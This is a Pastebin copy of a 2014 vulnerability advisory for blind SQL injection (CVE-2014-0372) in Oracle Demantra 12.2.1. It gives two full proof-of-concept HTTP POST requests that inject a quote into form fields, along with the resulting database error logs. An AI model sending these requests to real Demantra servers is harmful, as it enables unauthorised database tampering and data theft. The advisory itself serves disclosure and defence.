API tools faq
paste
Advertisement
Mayk0

#; Details: Application is vulnerable to SQL injection. I

Mayk0
Mar 1st, 2014
236
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.55 KB | None | 0 0
raw download clone embed print report
  1. Full title Oracle Demantra 12.2.1 - SQL Injection Vulnerability
  2. Date add 2014-03-02
  3. Category web applications
  4. Platform windows
  5. Risk <font color="#FFBF00">Security Risk High</font>
  6. CVE CVE: 2014-0372
  7. ====================================================================
  8.  
  9. Details:
  10.  
  11. Application is vulnerable to SQL injection.
  12. Impact:
  13.  
  14. An attacker with access to the vulnerable pages could manipulate the queries being sent to the database, potentially enabling them to:
  15.  
  16. - Extract sensitive information, including (but not limited to) authentication credentials and personal details. Such information could be sold by the attacker to other malicious individuals, used in other attacks (as the same password is often used across systems) or released publicly to damage the organisation’s reputation.
  17.  
  18. - Modify content within the application. If this was possible, the attacker could add malicious code to the application, which could then be used to deliver malware or exploit issues within client browsers.
  19.  
  20. In this particular instance, exploitation was more difficult as the results of the attack had to inferred based on the pages returned, often referred to as “blind” SQL Injection. This does not prevent exploitation, it simply means that the methods required to perform this attack require a very large number of requests to be made. However, because of this it is potentially easier to identify that an attack using this method is being attempted.
  21. Exploit:
  22.  
  23. POST /demantra/portal/editExecDefinition.jsp HTTP/1.1
  24. Host: www.target.com:8080
  25. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
  26. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  27. Accept-Language: en-US,en;q=0.5
  28. Accept-Encoding: gzip, deflate
  29. DNT: 1
  30. Referer: http://www.target.com:8080/demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=4&menuItemId=10&tkn=919872817530076
  31. Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=6741133838FDEC5D65258F72A4E4EB87
  32. Connection: keep-alive
  33. Content-Type: application/x-www-form-urlencoded
  34. Content-Length: 388
  35.  
  36. done=done&menuBarId=2&menuGroupId=4&tkn=919872817530076&menuItemId=10&menuAction=edit&order=0&command=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm'&title=Demantra+Web+Site&description=Demantra+Web+Site&type=3&fileInput=&linkInput=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm%27&desktopCommand=%23DEMANTRA.MODELER%23&param=
  37.  
  38. Related Error Log Entry:
  39.  
  40. 2013-08-01 16:42:11,039 PDT [http-8080-6] ERROR appserver.sql: ODPM-70173: Error SQL:
  41. [error occurred during batching: ORA-01756: quoted string not properly terminated]
  42. UPDATE EXEC_DEFINITION SET MENU_ITEM_ID = 10,EXEC_ID = 5,EXEC_PATH = '',EXEC_NAME = 'http://www.oracle.com/demantra/index.htm'',PARAMETERS = '',EXEC_TYPE = 3
  43. WHERE EXEC_ID = 5
  44. 2013-08-01 16:42:11,039 PDT [http-8080-6] ERROR appserver.error:
  45. com.demantra.applicationServer.appServerExceptions.FailedToExcuteBatch: java.sql.BatchUpdateException: error occurred during batching: ORA-01756: quoted string not properly terminated at com.demantra.applicationServer.services.DBServicesCommon.excuteBatch(DBServicesCommon.java:1446)
  46.  
  47. Sample Request #2:
  48.  
  49. POST /demantra/portal/saveProgramGroups.jsp HTTP/1.1
  50. Host: www.target.com:8080
  51. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
  52. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  53. Accept-Language: en-US,en;q=0.5
  54. Accept-Encoding: gzip, deflate
  55. DNT: 1
  56. Referer: http://www.target.com:8080/demantra/portal/programGroupDefinition.jsp
  57. Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=AC4D868CFC8F2B0CF06B62426A9F8CF7
  58. Connection: keep-alive
  59. Content-Type: application/x-www-form-urlencoded
  60. Content-Length: 170
  61.  
  62. selectedPGItems=SEL_TYPE_1_MODULE_5_ID_267%2CSEL_TYPE_1_MODULE_5_ID_267%2C&tkn=548771231479710&PGName=aaa'&PGDescription=aaaa&objectFilter=1&SEL_TYPE_1_MODULE_5_ID_267=on
  63.  
  64. Related Error Log Entry:
  65.  
  66. … 39 more
  67.  
  68. 2013-08-01 16:57:40,287 PDT [http-8080-9] ERROR appserver.sql: ODPM-70173: Error SQL:
  69. [error occurred during batching: ORA-00933: SQL command not properly ended]
  70. UPDATE PROGRAM_GROUPS SET NAME = 'aaa'',DESCRIPTION = 'aaaa' WHERE PROGRAM_GROUP_ID = 9
  71. 2013-08-01 16:57:40,287 PDT [http-8080-9] ERROR appserver.error:
  72. com.demantra.applicationServer.appServerExceptions.FailedToExcuteBatch: java.sql.BatchUpdateException: error occurred during batching: ORA-00933: SQL command not properly ended at com.demantra.applicationServer.services.DBServicesCommon.excuteBatch(DBServicesCommon.java:1446)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!